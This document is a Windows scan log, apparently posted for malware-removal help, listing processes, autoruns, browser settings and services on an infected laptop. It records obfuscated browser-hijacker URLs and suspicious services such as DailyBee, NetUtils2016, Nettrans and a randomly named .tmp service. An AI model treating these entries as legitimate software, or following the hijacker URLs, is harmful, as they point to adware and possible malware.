C:\Program Files (x86)\4baf5696-ef63-4372-a50c-30bd8cd532291483831172\knsCFBC.tmp
C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\MobileService.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
C:\Program Files (x86)\SecureW2\sw2_service.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\Program Files\LENOVO\HOTKEY\TPHKSVC.exe
C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\Program Files (x86)\Western Digital\WD Drive Manager\WDDriveService.exe
C:\Program Files\LENOVO\HOTKEY\TPHKLOAD.exe
C:\Program Files\LENOVO\HOTKEY\MICMUTE.exe
C:\Program Files\ThinkVantage Fingerprint Software\upeksvr.exe
C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\Windows\system32\svchost.exe -k HPService
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avpui.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
C:\WINDOWS\system32\taskhostw.exe
C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Windows\System32\RuntimeBroker.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\igfxEM.exe
C:\WINDOWS\system32\igfxHK.exe
C:\WINDOWS\system32\igfxTray.exe
C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
svchost.exe
C:\PROGRA~1\LENOVO\VIRTSCRL\virtscrl.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\PROGRA~1\Lenovo\HOTKEY\tpnumlkd.exe
C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
C:\Program Files\Synaptics\SynTP\SynLenovoHelper.exe
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
C:\Windows\System32\smartscreen.exe
C:\PROGRA~2\MOZILL~1\firefox.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
C:\Windows\System32\TpShocks.exe
C:\Program Files\Lenovo\Communications Utility\TpKnrres.exe
C:\Windows\System32\EmsServiceHelper.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe
C:\WINDOWS\system32\wbem\unsecapp.exe
C:\WINDOWS\system32\rundll32.exe
C:\PROGRA~1\Lenovo\HOTKEY\TPONSCR.EXE
C:\Program Files\HP\HP ENVY 4520 series\Bin\ScanToPCActivationApp.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\PROGRA~1\HP\HPENVY~1\Bin\HPNETW~1.EXE
C:\Users\King\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
C:\WINDOWS\sysWOW64\wbem\wmiprvse.exe
C:\Program Files (x86)\Dolby Advanced Audio v2\pcee4.exe
C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe
C:\Program Files (x86)\SecureW2\sw2_tray.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe
C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DeviceAgent.exe
C:\Program Files (x86)\Western Digital\WD Security\WDDriveAutoUnlock.exe
C:\Program Files (x86)\Western Digital\WD Utilities\WDDriveUtilitiesHelper.exe
C:\Program Files (x86)\Western Digital\WD App Manager\WDAppManager.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
C:\PROGRAM FILES (X86)\WESTERN DIGITAL\WD APP MANAGER\PLUGINS\WD BACKUP\App\WDBackupService.exe
C:\Program Files (x86)\Western Digital\WD Quick View\WDDMStatus.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
C:\Users\King\AppData\Roaming\DailyBee\DailyBee.exe
C:\Users\King\AppData\Roaming\DailyBee\DailyBee.exe
C:\Users\King\AppData\Roaming\DailyBee\DailyBee.exe
C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Secure Connection 1.0\ksde.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Secure Connection 1.0\ksdeui.exe
C:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IMSS\PrivacyIconClient.exe
\\?\C:\WINDOWS\system32\wbem\WMIADAP.EXE
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\WINDOWS\system32\SearchFilterHost.exe
C:\WINDOWS\system32\taskhostw.exe
C:\Users\King\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
C:\Windows\System32\InstallAgent.exe
C:\WINDOWS\system32\taskhostw.exe
C:\Windows\System32\InstallAgentUserBroker.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPhuTaZ17vJ3frYi3tu3Ogeh5wq8PGBP668Kb01qmK68B0H3e4uN278ch3MwXhoIgdAtlk_77PcQMchp6luA0gExYRQXNhrNa4QWTjIFNtwhXL_QtINwm7jhJAlGDd04ewzpU9S-kYkr6yjD7qACxDA7jEkYGv6OBGGlGCm2uc
uSearch Bar = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPhuTaZ17vJ3frYi3tu3Ogeh5wq8PGBP668Kb01qmK68B0H3e4uN278ch3MwXhoIgdAtlk_77PcQMchpKttnTSluHTGxiwYTcSBNYa-4MBDXuo7Px7wMdm7bLmOwBL3zTcQOgmS6YkaS2afMAu4FhDoKnSVW0ZnmEvfFJ5TBZf&q={searchTerms}
uSearch Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPhuTaZ17vJ3frYi3tu3Ogeh5wq8PGBP668Kb01qmK68B0H3e4uN278ch3MwXhoIgdAtlk_77PcQMchpKttnTSluHTGxiwYTcSBNYa-4MBDXuo7Px7wMdm7bLmOwBL3zTcQOgmS6YkaS2afMAu4FhDoKnSVW0ZnmEvfFJ5TBZf&q={searchTerms}
BHO: &Yahoo! Toolbar Helper: {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll
BHO: HP Print Enhancer: {0347C33E-8762-4905-BF09-768834316C61} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll
BHO: Kaspersky Protection: {2E38825B-8815-42CF-9126-C58BC28D4591} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\IEExt\ie_plugin.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll
BHO: Symantec VIP Access Add-On: {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} - C:\Program Files (x86)\Symantec\VIP Access Client\VIPAddOnForIE.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll
BHO: {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - <orphaned>
BHO: SingleInstance Class: {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\YTSingleInstance.dll
BHO: HP Smart BHO Class: {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll
TB: Yahoo! Toolbar: {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll
TB: Kaspersky Protection Toolbar: {093F479D-712E-46CD-9E06-62E734A05F68} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\IEExt\ie_plugin.dll
EB: HP Smart Web Printing: {555D4D79-4BD2-4094-A395-CFC534424A05} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_bho.dll
EB: HP Smart Web Printing: {555D4D79-4BD2-4094-A395-CFC534424A05} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_bho.dll
uRun: [iCloudServices] C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
uRun: [ApplePhotoStreams] C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
uRun: [Uploader] C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe
uRun: [HP ENVY 4520 series (NET)] "C:\Program Files\HP\HP ENVY 4520 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH5A92F0NG0660:NW" -scfn "HP ENVY 4520 series (NET)" -AutoStart 1
uRun: [OneDrive] "C:\Users\King\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
uRun: [iCloudDrive] C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe
mRun: [USB3MON] "C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
mRun: [IMSS] "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IMSS\PIconStartup.exe"
mRun: [Dolby Advanced Audio v2] "C:\Program Files (x86)\Dolby Advanced Audio v2\pcee4.exe" -autostart
mRun: [Intel AppUp(SM) center] "C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe" --domain-id F0399437-FD0C-4A48-B101-F0314A6172E4
mRun: [Lenovo Registration] C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe /boot
mRun: [SecureW2 Tray] C:\Program Files (x86)\SecureW2\sw2_tray.exe
mRun: [HP Software Update] C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
mRun: [DBAgent] "C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe" /WinStart
mRun: [WDAppManager] C:\Program Files (x86)\Western Digital\WD App Manager\AppManagerLauncher.exe
mRun: [WD Drive Unlocker] C:\Program Files (x86)\Western Digital\WD Security\WDDriveAutoUnlock.exe
mRun: [DriveUtilitiesHelper] C:\Program Files (x86)\Western Digital\WD Utilities\WDDriveUtilitiesHelper.exe
mRun: [WD Quick View] C:\Program Files (x86)\Western Digital\WD Quick View\WDDMStatus.exe
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [Dropbox] "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
mRun: [DailyBee] C:\Users\King\AppData\Roaming\DailyBee\DailyBee.exe su
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\StartUp\HPDIGI~1.LNK - C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
mPolicies-Explorer: NoDriveTypeAutoRun = dword:60
mPolicies-System: DSCAutomationHostEnabled = dword:2
mPolicies-System: HideFastUserSwitching = dword:1
IE: E&xport to Microsoft Excel - C:\Program Files (x86)\Microsoft Office\OFFICE11\EXCEL.EXE/3000
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {A95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll/204
IE: {DDE87865-83C5-48c4-8357-2F5B1AA84522} - {DDE87865-83C5-48c4-8357-2F5B1AA84522} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll
IE: {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - <orphaned>
TCP: NameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{287b1ad6-97da-4607-a580-2abda2c5ac79} : DHCPNameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{287b1ad6-97da-4607-a580-2abda2c5ac79}\84F4D454D203347363D223E243 : DHCPNameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{287b1ad6-97da-4607-a580-2abda2c5ac79}\84F4D454D203347363D253 : DHCPNameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{98bff00c-bb80-4b13-9b96-7b50f97f6435} : DHCPNameServer = 75.75.75.75 75.75.76.76
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
LSA: Notification Packages = scecli C:\Program Files\ThinkPad\Bluetooth Software\BtwProximityCP.dll C:\Program Files\ThinkVantage Fingerprint Software\psqlpwd.dll
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
mASetup: {A6EADE66-0000-0000-484E-7E8A45000000} - "C:\WINDOWS\SysWOW64\Rundll32.exe" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\AiodLite.dll",CreateReaderUserSettings
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-BHO: Kaspersky Protection: {2E38825B-8815-42CF-9126-C58BC28D4591} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\x64\IEExt\ie_plugin.dll
x64-BHO: Symantec VIP Access Add-On: {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} - C:\Program Files (x86)\Symantec\VIP Access Client\64bit\VIPAddOnForIE64.dll
x64-BHO: {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - <orphaned>
x64-TB: Kaspersky Protection Toolbar: {093F479D-712E-46CD-9E06-62E734A05F68} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\x64\IEExt\ie_plugin.dll
x64-Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [RtHDVBg_Dolby] C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /FORPCEE4
x64-Run: [IgfxTray] C:\WINDOWS\System32\igfxtray.exe
x64-Run: [TpShocks] TpShocks.exe
x64-Run: [LENOVO.TPKNRRES] C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe
x64-Run: [EmsService] EmsServiceHelper.exe
x64-Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
x64-mPolicies-Explorer: NoDriveTypeAutoRun = dword:60
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-mPolicies-System: HideFastUserSwitching = dword:1
x64-IE: {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - <orphaned>
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: psfus - C:\Program Files\ThinkVantage Fingerprint Software\psqlpwd.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\poyyzgho.default-1474588217013\
FF - prefs.js: browser.startup.homepage - C:\\ProgramData\\Zaamlas\\ff.HP
FF - plugin: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\4.0.50401.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Users\King\AppData\Roaming\Mozilla\plugins\npatgpc.dll
FF - plugin: C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_11_8_800_168.dll
FF - plugin: C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_186.dll
.
============= SERVICES / DRIVERS ===============
.
R0 cm_km;AO Kaspersky Lab Cryptographic Module x64 (56 bit);C:\WINDOWS\System32\drivers\cm_km.sys [2016-6-10 238936]
R0 CmgPCS;Credant PCS;C:\WINDOWS\System32\drivers\CmgPCS.sys [2013-5-10 144168]
R0 CmgShieldCEF;CmgShieldCEF;C:\WINDOWS\System32\drivers\CMGShCEF.sys [2013-5-10 381224]
R0 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2016-7-16 48152]
R0 iorate;iorate;C:\WINDOWS\System32\drivers\iorate.sys [2016-11-9 48992]
R0 iusb3hcs;Intel(R) USB 3.0 Host Controller Switch Driver;C:\WINDOWS\System32\drivers\iusb3hcs.sys [2013-7-5 16152]
R0 klbackupdisk;Kaspersky Lab klbackupdisk;C:\WINDOWS\System32\drivers\klbackupdisk.sys [2016-6-7 63920]
R0 klupd_klif_arkmon;klupd_klif_arkmon;C:\WINDOWS\System32\drivers\klupd_klif_arkmon.sys [2016-12-8 218920]
R0 klupd_klif_klbg;klupd_klif_klbg;C:\WINDOWS\System32\drivers\klupd_klif_klbg.sys [2016-12-8 104720]
R0 TPDIGIMN;TPDIGIMN;C:\WINDOWS\System32\drivers\ApsHM64.sys [2011-12-29 25416]
R0 volume;Volume driver;C:\WINDOWS\System32\drivers\volume.sys [2016-7-16 16224]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2016-7-16 107032]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2016-7-16 17944]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2016-9-13 199008]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2016-10-28 227328]
R1 eamonm;eamonm;C:\WINDOWS\System32\drivers\eamonm.sys [2013-9-17 239320]
R1 EpfwLWF;Epfw NDIS LightWeight Filter;C:\WINDOWS\System32\drivers\EpfwLWF.sys [2013-9-17 44120]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2016-7-16 88576]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2016-7-16 8192]
R1 klbackupflt;Kaspersky Lab klbackupflt;C:\WINDOWS\System32\drivers\klbackupflt.sys [2016-6-14 86352]
R1 klhk;Kaspersky Lab service driver;C:\WINDOWS\System32\drivers\klhk.sys [2016-6-20 435032]
R1 KLIM6;Kaspersky Anti-Virus NDIS 6 Filter;C:\WINDOWS\System32\drivers\klim6.sys [2016-6-20 57424]
R1 klpd;Kaspersky Lab format recognizer driver;C:\WINDOWS\System32\drivers\klpd.sys [2016-5-31 45488]
R1 klwfp;klwfp;C:\WINDOWS\System32\drivers\klwfp.sys [2016-6-18 85320]
R1 Klwtp;KLwtp - WFP callout traffic inspector;C:\WINDOWS\System32\drivers\klwtp.sys [2016-6-2 134880]
R1 kneps;kneps;C:\WINDOWS\System32\drivers\kneps.sys [2016-6-14 194480]
R1 NetUtils2016;NetUtils2016;C:\WINDOWS\System32\drivers\NetUtils2016.sys [2017-1-7 909944]
R2 Apple Mobile Device Service;Apple Mobile Device Service;C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [2016-9-22 83768]
R2 AVP17.0.0;Kaspersky Anti-Virus Service 17.0.0;C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avp.exe [2016-6-28 241544]
R2 backlh;Background Logic Handler;C:\ProgramData\Logic Handler\set.exe [2017-1-7 3786752]
R2 BcmBtRSupport;Bluetooth Driver Management Service;C:\WINDOWS\System32\BtwRSupportService.exe [2015-3-27 2251992]
R2 CDPSvc;Connected Devices Platform Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
R2 CDPUserSvc_87960;CDPUserSvc_87960;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R2 clreg;Virtual Registry for Containers;C:\WINDOWS\System32\drivers\registry.sys [2016-7-16 70144]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork [2016-7-16 44496]
R2 DbxSvc;DbxSvc;C:\WINDOWS\System32\DbxSvc.exe [2016-12-21 42096]
R2 DiagTrack;Connected User Experiences and Telemetry;C:\WINDOWS\System32\svchost.exe -k utcsvc [2016-7-16 44496]
R2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R2 EMS;EMS;EMSService.exe --> EMSService.exe [?]
R2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service;C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [2015-12-20 26168]
R2 igfxCUIService1.0.0.0;Intel(R) HD Graphics Control Panel Service;C:\WINDOWS\System32\igfxCUIService.exe [2016-5-3 337888]
R2 Intel(R) Capability Licensing Service Interface;Intel(R) Capability Licensing Service Interface;C:\Program Files\Intel\iCLS Client\HeciServer.exe [2012-2-3 628448]
R2 IntuitUpdateServiceV4;Intuit Update Service v4;C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe [2016-9-7 21216]
R2 jhi_service;Intel(R) Dynamic Application Loader Host Interface Service;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe [2013-7-5 161560]
R2 kldisk;kldisk;C:\WINDOWS\System32\drivers\kldisk.sys [2016-5-31 78216]
R2 KSDE1.0.0;Kaspersky Secure Connection Service 1.0.0;C:\Program Files (x86)\Kaspersky Lab\Kaspersky Secure Connection 1.0\ksde.exe [2016-6-28 241544]
R2 LENOVO.CAMMUTE;Lenovo Camera Mute;C:\Program Files\Lenovo\Communications Utility\CamMute.exe [2013-7-5 58224]
R2 LENOVO.MICMUTE;Lenovo Microphone Mute;C:\Program Files\Lenovo\HOTKEY\micmute.exe [2012-5-8 101736]
R2 LENOVO.TPKNRSVC;Lenovo Keyboard Noise Reduction;C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe [2013-7-5 61296]
R2 LENOVO.TVTVCAM;ThinkVantage Virtual Camera Controller;C:\Program Files\Lenovo\Communications Utility\vcamsvc.exe [2013-7-5 179568]
R2 Lenovo.VIRTSCRLSVC;Lenovo Auto Scroll;C:\Program Files\Lenovo\VIRTSCRL\lvvsst.exe [2012-5-8 133992]
R2 Nettrans;Network Packet Manitor;C:\ProgramData\NetworkPacketManitor\Nettrans.exe [2017-1-7 43520]
R2 NetUtils2016srv;NetUtils2016srv;C:\WINDOWS\System32\NetUtils2016.exe --> C:\WINDOWS\System32\NetUtils2016.exe [?]
R2 nlsX86cc;Nalpeiron Licensing Service;C:\Windows\SysWOW64\NLSSRV32.EXE [2016-3-3 71832]
R2 OneSyncSvc_87960;Sync Host_87960;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R2 qevisufy;Space Subscript;C:\Program Files (x86)\4baf5696-ef63-4372-a50c-30bd8cd532291483831172\knsCFBC.tmp [2017-1-8 404480]
R2 Seagate Dashboard Services;Seagate Dashboard Services;C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe [2015-2-13 16216]
R2 Seagate MobileBackup Service;Seagate MobileBackup Service;C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\MobileService.exe [2015-4-1 157992]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2016-7-16 78336]
R2 SW2SVC;SecureW2 Service;C:\Program Files (x86)\SecureW2\sw2_service.exe [2012-11-2 106920]
R2 SynTPEnhService;SynTPEnh Caller Service;C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [2016-4-21 259176]
R2 tiledatamodelsvc;Tile Data model server;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
R2 TPHKLOAD;Lenovo Hotkey Client Loader;C:\Program Files\Lenovo\HOTKEY\tphkload.exe [2012-5-8 145256]
R2 TPHKSVC;On Screen Display;C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe [2012-5-8 144960]
R2 UNS;Intel(R) Management and Security Application User Notification Service;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [2013-7-5 363800]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R2 VIPAppService;VIPAppService;C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe [2012-4-19 84080]
R2 wcifs;Windows Container Isolation;C:\WINDOWS\System32\drivers\wcifs.sys [2016-10-1 119648]
R2 wcnfs;Windows Container Name Virtualization;C:\WINDOWS\System32\drivers\wcnfs.sys [2016-7-16 66560]
R2 WDDriveService;WD Drive Manager;C:\Program Files (x86)\Western Digital\WD Drive Manager\WDDriveService.exe [2015-12-7 308088]
R2 WpnService;Windows Push Notifications System Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R3 5U877;5U877;C:\WINDOWS\System32\drivers\5U877.sys [2013-7-5 216704]
R3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2016-7-16 44496]
R3 bcbtums;Bluetooth RAM Firmware Download USB Filter;C:\WINDOWS\System32\drivers\bcbtums.sys [2015-3-27 173312]
R3 BthLEEnum;Bluetooth Low Energy Driver;C:\WINDOWS\System32\drivers\BthLEEnum.sys [2016-10-1 249856]
R3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2016-7-16 44496]
R3 IntcDAud;Intel(R) Display Audio;C:\WINDOWS\System32\drivers\IntcDAud.sys [2013-7-5 331264]
R3 iwdbus;IWD Bus Enumerator;C:\WINDOWS\System32\drivers\iwdbus.sys [2015-12-1 38896]
R3 klflt;Kaspersky Lab Kernel DLL;C:\WINDOWS\System32\drivers\klflt.sys [2016-8-10 191312]
R3 klids;klids;C:\ProgramData\Kaspersky Lab\AVP17.0.0\Bases\klids.sys [2016-8-10 182360]
R3 klkbdflt;Kaspersky Lab KLKBDFLT;C:\WINDOWS\System32\drivers\klkbdflt.sys [2016-5-18 52136]
R3 klmouflt;Kaspersky Lab KLMOUFLT;C:\WINDOWS\System32\drivers\klmouflt.sys [2015-6-7 41656]
